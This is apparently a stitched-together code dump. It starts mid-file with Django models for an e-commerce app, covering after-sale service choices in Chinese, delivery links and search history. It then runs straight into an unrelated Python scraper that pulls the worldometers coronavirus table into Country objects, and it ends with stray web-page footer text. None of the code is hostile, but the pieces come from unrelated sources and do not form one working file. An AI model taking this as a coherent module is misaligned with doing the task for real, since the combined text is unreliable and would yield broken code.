    create_time=models.DateTimeField(auto_now_add=True,editable=False)
class AfterSaleServices(models.Model):
    """After-sale service promise attached to a good."""
    good_detail = models.ForeignKey(to='GoodDetail', on_delete=models.CASCADE,related_name='after_sale_services')
    # Service option; defaults to 3, the mandatory 7-day return promise.
    server= models.IntegerField(
        choices=((0, '提供发票'), (1, '保修服务'), (2, '退换货承诺,凡使用微信购买本店商品,若存在质量问题或与描述不符,本店将主动退换货服务并承担来回运费'),
                 (3, '服务承诺:该类商品必须支持【七天退货服务】')),default=3)
class GoodDeliver(models.Model):
    """Link between a good and a platform delivery provider."""
    good_detail = models.ForeignKey(to='GoodDetail',on_delete=models.CASCADE,related_name='delivers')
    server = models.ForeignKey(to='platforms.Delivers',on_delete=models.CASCADE)
class SearchHistory(models.Model):
    """A user's search query, most recently used first."""
    user = models.ForeignKey(to=User,on_delete=models.CASCADE)
    # The raw query string.
    q= models.CharField(max_length=128)
    update_time=models.DateTimeField(auto_now=True)

    class Meta:
        ordering=('-update_time',)
import requests
from bs4 import BeautifulSoup
import pandas as pd
from model import country
def getTable():
    """Fetch the worldometers coronavirus page and return the main table.

    Returns the ``<table id="main_table_countries_today">`` element, or
    ``None`` if the page layout changed and the table is missing.

    Raises ``requests.HTTPError`` on a non-2xx response and the usual
    ``requests`` exceptions on network failure/timeout.
    """
    URL = "https://www.worldometers.info/coronavirus/"
    # A timeout prevents the scraper from hanging forever on a stalled
    # connection; raise_for_status surfaces HTTP errors instead of letting
    # BeautifulSoup silently parse an error page.
    page = requests.get(URL, timeout=30)
    page.raise_for_status()
    soup = BeautifulSoup(page.content, 'html.parser')
    return soup.find(id='main_table_countries_today')
def createDataFrame():
    """Build an empty pandas DataFrame whose columns are the table headers."""
    header_cells = getTable().find_all('th')
    column_names = [cell.text for cell in header_cells]
    return pd.DataFrame(columns=column_names)
def dataFrameToNumpyArray():
    """Fill the dataframe with the table's rows and return it as a numpy array.

    Skips the header row; each ``<td>``'s text becomes one cell.
    """
    df = createDataFrame()
    # Collect all rows first: appending to a DataFrame one row at a time
    # (df.loc[len(df)] = row) copies the frame on every insert, which is
    # quadratic in the number of rows.
    rows = [[td.text for td in tr.find_all('td')]
            for tr in getTable().find_all('tr')[1:]]
    return pd.DataFrame(rows, columns=df.columns).to_numpy()
def fillCountriesList():
    """Filling the list of Country objects."""
    data = dataFrameToNumpyArray()
    # The first 7 rows are aggregate rows; real country rows start at 7.
    # Columns 1..21 are exactly the positional fields Country() expects.
    return [country.Country(*row[1:22]) for row in data[7:]]
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.